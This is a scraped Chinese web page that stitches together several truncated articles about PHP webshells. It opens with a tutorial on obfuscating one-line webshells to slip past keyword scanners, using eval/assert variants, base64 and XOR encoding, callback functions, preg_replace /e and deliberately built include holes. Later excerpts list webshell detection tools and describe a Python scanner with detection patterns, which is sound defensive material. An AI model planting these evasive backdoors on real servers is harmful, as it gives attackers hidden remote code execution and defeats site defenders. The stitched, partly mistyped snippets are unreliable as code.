精华内容
下载资源
问答
  • webshell查杀

    2019-10-06 14:02:13
    大部分Webshell查杀工具都是基于关键字特征的,通常他们会维护一个关键字列表,以此遍历指定扩展名的文件来进行扫描,所以可能最先想到的是各种字符串变形,下面总结了一些小的方法,各种不足之前还请看官拍砖. ...

    大部分Webshell查杀工具都是基于关键字特征的,通常他们会维护一个关键字列表,以此遍历指定扩展名的文件来进行扫描,所以可能最先想到的是各种字符串变形,下面总结了一些小的方法,各种不足之前还请看官拍砖.

     

    0×01 字符串上的舞蹈

    一般标准的一句话Webshell是利用PHP的eval函数,动态执行其他函数功能.其标准的形式如下:

     

    @eval ($_POST[xxxxx]);

     

    很明显的eval会成为静态特征码Webshell扫描工具的关键字.加上一点小技巧,我们让其动态传入,或者利用base64等编码函数来进行绕过

     

    @$_GET[a]($_POST[xxxxx]);

    or

     

    @base64_decode(base64编码过的eval)

     

    当然,扫一眼PHP手册,玩转字符串的函数远不止这些,你可以写一个自定义加解密的函数,或者利用xor,字符串反转,压缩,截断重组等方法来绕过.

    另外大多数Webshell的查杀工具很少把assert函数加入到关键字列表中,不过随着使用的人越来越多也不是绝对的,我们也可以用assert替换eval来执行猥琐的功能.

    以前在ASP一句话Webshell的变形过程中,打乱和拆分文件也是非常常用的功能,这里也记一笔.用require,include等将字符串拆分再重组.或者将加密好的字符串单独放在任意扩展名文件中,利用解密函数读取文件来执行,这里写一个base64比较简单的例子

    file_put_contents(base64_decode(filepath+filename),base64_decode(EvilC0de));

     

    字符串的各种猥琐还是很多的,最致命的地方是,如果有基于语义分析的查杀工具露面(我印象中是有的)这些都完蛋 –__-!

    0×02 利用PHP函数的一些特性

    这一小段其实还是建立在玩转了字符串的基础上的,一个小例子

    if(key($_GET)=='xxxxxx')
    call_user_func($_GET[xxx],$_POST[evil]);

    好吧,我承认这有点换汤不换药,这种类型的就是遇到WAF都挂b,因为基本上都是基于动态传入参数的,然后利用PHP函数换了个形式执行而已,最终还是调用eval,下面是一个小小的延伸

    $x=create_function('',$_GET[x]); $x();

    再扫一眼PHP手册,我们在《高级PHP漏洞审计》读到过还有其他一些带有执行功能的函数,比如经常用的preg_replace加/e参数的黄金组合,这类一句话Webshell也算是比较常见的了.总结起来他们可以算作是人为的构造一些PHP代码上的漏洞.比如

    $f=$_GET[x];
    include($f);

    这样构造一个包含漏洞出来,或者

    $s= copy,movefile ; //…. etc
    $s(参数调用)比如copy($_FILES[t][src],$_FILES[t][dst]);

    利用一些文件操作函数来猥琐一些小动作,再或者来个preg_replace执行漏洞的经典例子

    $t= prege_replace;
    $t("/[xxx]/e",$_POST[x],"Hah!~");

    这一方面能发散的地方还有很多,还是得多瞅瞅PHP手册,因为PHP的相关函数真是太猥琐了.

    0×03 利用PHP的一些魔法特性

      不知道能不能把PHP的多态性叫做魔法特性,错误之处还请指出.看过Ryat和Qz牛的文章后会更好理解,老外给过一个经典的例子

     

    ($_=@$_GET[2]).@$_($_POST[1]);

    and

     

    $_="";
    $_[+""]='';
    $_="$_"."";
    $_=($_[+""]|"").($_[+""]|"").($_[+""]^"");

    or

    ${'_'.$_}['_'](${'_'.$_}['__']);

    当然我们实际不会这么去写,因为管理员瞅一眼就明白你是要做坏事了.这其中也结合了移位运算等,算是写得很花哨了 – -~

    经常用MVC之类的框架搞开发,都能发现__autoload函数的好处,自己文件名去new一个类,然后在类中你可以在构造函数做点手脚什么的,而这一类函数在PHP中也是有不少的,我们可以猥琐一下加以利用.

    另外常见的ob_start等利用PHP函数的回调特性也是有的,其实觉得应该把这个分类放到上一小节,之前和wulin牛也讨论过这种方式加密过的马的解密,不过现在大多数Webshell查杀工具都应该把它加到关键字了吧.

     

    0×04 未完结

    我一直相信还有更加猥琐的方式等等,攻防对立,也可以参考 核攻击
    大牛在其lcx.cc上发布的讨论怎么从一万多个文件中快速定位Webshell来见招拆招.引用黑防之前一句很装13的话作为结语:在攻与防的对立中寻求统一.欢迎更多同学加入讨论~

    转载于:https://www.cnblogs.com/Reverser/p/5136201.html

    展开全文
  • Webshell查杀C#源码

    2018-12-02 05:11:53
    Webshell查杀C#源码,最新64位系统专版,源码只用于技术交流,秉承分享精神,请勿用于商业用途
  • 一款好用的linux下的webshell查杀软件。linux下的webshell查杀工具很少,所以这里分享出来。用于发现服务器上的web后门 官方网站地址:https://www.shellpub.com
  • Seay webshell查杀工具 C#版源码 懂得有需要的可以看看 非常不错
  • webshell查杀工具1.0.exe

    2013-11-23 23:59:18
    Seay webshell查杀工具1.0
  • Linux系统webshell查杀

    2021-03-02 23:58:03
    下载webshell查杀工具河马 下载64位版本 wget -O hm-linux.tgz http://down.shellpub.com/hm/latest/hm-linux-amd64.tgz?version=1.6.0 下载32位版本 wget -O hm-linux.tgz ...

    测试是否能通外网。

    查看操作系统

    下载webshell查杀工具河马

    下载64位版本 wget -O hm-linux.tgz http://down.shellpub.com/hm/latest/hm-linux-amd64.tgz?version=1.6.0
    下载32位版本 wget -O hm-linux.tgz http://down.shellpub.com/hm/latest/hm-linux-386.tgz?version=1.6.0

    解压

    找网站路径

    find / -name * .html

    查杀webshell

    ./hm scan /var/share/www

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

    展开全文
  • Seay webshell 查杀工具 常见的webshell扫描查杀工具 支持 asp aspx php jsp
  • 一、河马webshell查杀:http://www.shellpub.com 解压hm-linux-amd64.tgz 扫描 二、深信服Webshell网站后门检测工具:https://edr.sangfor.com.cn/#/introduction/wehshell tar -zxvf ...

    一、河马webshell查杀:http://www.shellpub.com

    解压hm-linux-amd64.tgz

    扫描


    二、深信服Webshell网站后门检测工具:https://edr.sangfor.com.cn/#/introduction/wehshell

    tar -zxvf WebShellKillerForLinux.tar.gz
    cd centos_64/wscan_app/
    #配置类库路径
    export LD_LIBRARY_PATH=/home/web/centos_64/wscan_app:$LD_LIBRARY_PATH 
    #扫描
    ./wscan -hrf /home

     

     

    展开全文
  • 当网站服务器被入侵时,我们需要一款Webshell...1、D盾_Web查杀 阿D出品,使用自行研发不分扩展名的代码分析引擎,能分析更为隐藏的WebShell后门行为。 兼容性:只提供Windows版本。 工具下载地址:http://www.d99net.

    当网站服务器被入侵时,我们需要一款Webshell检测工具,来帮助我们发现webshell,进一步排查系统可能存在的安全漏洞。

    本文推荐了10款Webshll检测工具,用于网站入侵排查。当然,目前市场上的很多主机安全产品也都提供这种WebShell检测能力,比如阿里云、青藤云、safedog等,本文暂不讨论。

    1、D盾_Web查杀

    阿D出品,使用自行研发不分扩展名的代码分析引擎,能分析更为隐藏的WebShell后门行为。

    兼容性:只提供Windows版本。

    工具下载地址:http://www.d99net.net/down/WebShellKill_V2.0.9.zip

    在这里插入图片描述

    2、百度WEBDIR+

    下一代WebShell检测引擎,采用先进的动态监测技术,结合多种引擎零规则查杀。

    兼容性:提供在线查杀木马,免费开放API支持批量检测。

    在线查杀地址:https://scanner.baidu.com/

    在这里插入图片描述

    3、河马

    专注webshell查杀研究,拥有海量webshell样本和自主查杀技术,采用传统特征+云端大数据双引擎的查杀技术。查杀速度快、精度高、误报低。

    兼容性:支持Windows、linux,支持在线查杀。

    官方网站:https://www.shellpub.com/

    在这里插入图片描述

    4、Web Shell Detector

    Webshell Detector具有“ Webshell”签名数据库,可帮助识别高达99%的“ Webshell”。

    兼容性:提供php/python脚本,可跨平台,在线检测。

    官方网站:http://www.shelldetector.com/

    github项目地址:https://github.com/emposha/PHP-Shell-Detector

    在这里插入图片描述

    5、CloudWalker(牧云)

    一个可执行的命令行版本 Webshell 检测工具。目前,项目已停止更新。

    兼容性,提供linux版本,Windows 暂不支持。

    在线查杀demo:https://webshellchop.chaitin.cn/

    github项目地址:https://github.com/chaitin/cloudwalker

    在这里插入图片描述

    6、Sangfor WebShellKill

    Sangfor WebShellKill(网站后门检测工具)是一款web后门专杀工具,不仅支持webshell的扫描,同时还支持暗链的扫描。是一款融合了多重检测引擎的查杀工具。能更精准地检测出WEB网站已知和未知的后门文件。

    兼容性:支持Windows、linux

    工具下载地址:http://edr.sangfor.com.cn/backdoor_detection.html(已停止访问)

    在这里插入图片描述

    7、深度学习模型检测PHP Webshell

    一个深度学习PHP webshell查杀引擎demo,提供在线样本检测。

    在线查杀地址:http://webshell.cdxy.me/

    在这里插入图片描述

    8、PHP Malware Finder

    PHP-malware-finder 是一款优秀的检测webshell和恶意软件混淆代码的工具

    兼容性:提供linux版本,Windows 暂不支持。

    github项目地址:https://github.com/jvoisin/php-malware-finder

    在这里插入图片描述

    9、findWebshell

    这个项目是一款基于python开发的webshell检查工具,可以根据特征码匹配检查任意类型的webshell后门。

    github项目地址:https://github.com/he1m4n6a/findWebshell

    在这里插入图片描述

    10、在线webshell查杀工具

    在线查杀地址:http://tools.bugscaner.com/killwebshell/

    在这里插入图片描述

    免责声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。禁止任何人转载到其他站点,禁止用于任何非法用途。如有任何人凭此做何非法事情,均于笔者无关,特此声明。

    展开全文
  • 首先使用绕过D盾的webshell,发现被标记为恶意。这就有点意思了。我去看了一下聊天记录的内容,看原理是采用的深度学习的方式。猜测是有监督的方式来实现的(仅为猜测)。我这里绕过的思路采用的是,使用开源程序...
  • 搞了一个python版查杀php webshell后门工具,大家可以增加后门的特征码,然后甩到后台给他查杀就可以了。适合Linux系统服务器的站长们 这个代码比较简单,大家可以自己继续完善下。主要是根据特征...
  • Webshell查杀工具

    千次阅读 2006-10-04 21:47:00
    信息来源:邪恶八进制信息安全团队(www.eviloctal.com)文章作者:lake2ASP写的查ASP木马的小东东,在肉鸡上使用,拿来把其他同行的webshell给接管掉~邪八的朋友测试下,要是有这东东查不到的ASP木马欢迎交流哦...
  • Webshell一直都是网站管理员痛恨看到的东西,一旦在网站目录里看到了陌生的webshell基本说明网站已经被攻击者拿下了。站在攻击者的角度,要想渗透一台网站服务器,第一个目标也是想方设法的寻找漏洞上传webshell。 ...
  • 显示不全请点击全屏阅读这是我2013年写的一个linux下的webshell查杀程序,基于python开发。程序截图:使用方法:python main.py 查杀路径python main.py 查杀路径 时间("2014-01-01 12:11:13")程序特点说明:1.这款...
  • webshell分析与查杀

    2020-04-24 00:44:52
    webshell查杀工具 一、webshell与webshell管理工具 回到顶部 二、webshell变形免杀技术 还有很多其他的手段…… 回到顶部 三、webshell查杀工具 D盾 WEBDIR+ 3. php-malware-finder 4. web shell ...
  • 查杀指定路径:pythonwebshell.py 路径2.按时间查找文件:python webshell.py 路径 “2013-09-28 00:00:00″# -*- coding: utf-8 -*-import osimport sysimport reimport timerulelist = [‘(\$_(GET|POST|REQUEST)\...
  • Linux下Python版webshell后门查杀工具

    千次阅读 2018-04-25 08:59:13
    查杀指定路径:python webshell.py 路径2.按时间查找文件:python webshell.py 路径 “2013-09-28 00:00:00″python实现代码:# -*- coding: utf-8 -*- import os import sys import re import time rulelist = ...
  • 查杀指定路径:pythonwebshell.py 路径2.按时间查找文件:python webshell.py 路径 “2013-09-28 00:00:00″# -*- coding: utf-8 -*-import osimport sysimport reimport timerulelist = ['(\$_(GET|POST|REQUEST)\...
  • 查杀指定路径:pythonwebshell.py 路径2.按时间查找文件:python webshell.py 路径 “2013-09-28 00:00:00″# -*- coding: utf-8 -*-import osimport sysimport reimport timerulelist = ['(\$_(GET|POST|REQUEST)\...
  • 查杀指定路径:pythonwebshell.py 路径2.按时间查找文件:python webshell.py 路径 “2013-09-28 00:00:00″# -*- coding: utf-8 -*-import osimport sysimport reimport timerulelist = ['(\$_(GET|POST|REQUEST)\...
  • 4个好用的WebShell网站后门查杀工具 在线木马查杀 游子1年前建站资源97,576次0 迫于网上下载的主题、插件后门事件,游子介绍几款后门查杀软件! 检测工具分别是D盾_Web查杀、WebShellkiller、河马查杀、百度...
  • LINUX下WebShell查杀

    2010-08-24 23:02:46
    相信每位系统管理所管理的LINUX服务器都中过WebShell之类的***吧~~很不幸~~前两天我也中了一会奖~~~这里将查杀经验分享给大家 现象:服务器上的网页由一个到数个,慢慢全部打不开,输入网址后浏览器显示的是白屏 ...
  • 1.查杀指定路径:python webshell.py 路径 2.按时间查找文件:python webshell.py 路径 “2013-09-28 00:00:00″ # -*- coding: utf-8 -*- import osimport sysimport reimport time rulelist = [ '(\$_(GET|...
  • Linux下查杀webshell木马的工具.zip
  • Windows下查杀webshell木马的工具.zip

空空如也

空空如也

1 2 3 4 5 ... 11
收藏数 208
精华内容 83
关键字:

webshell查杀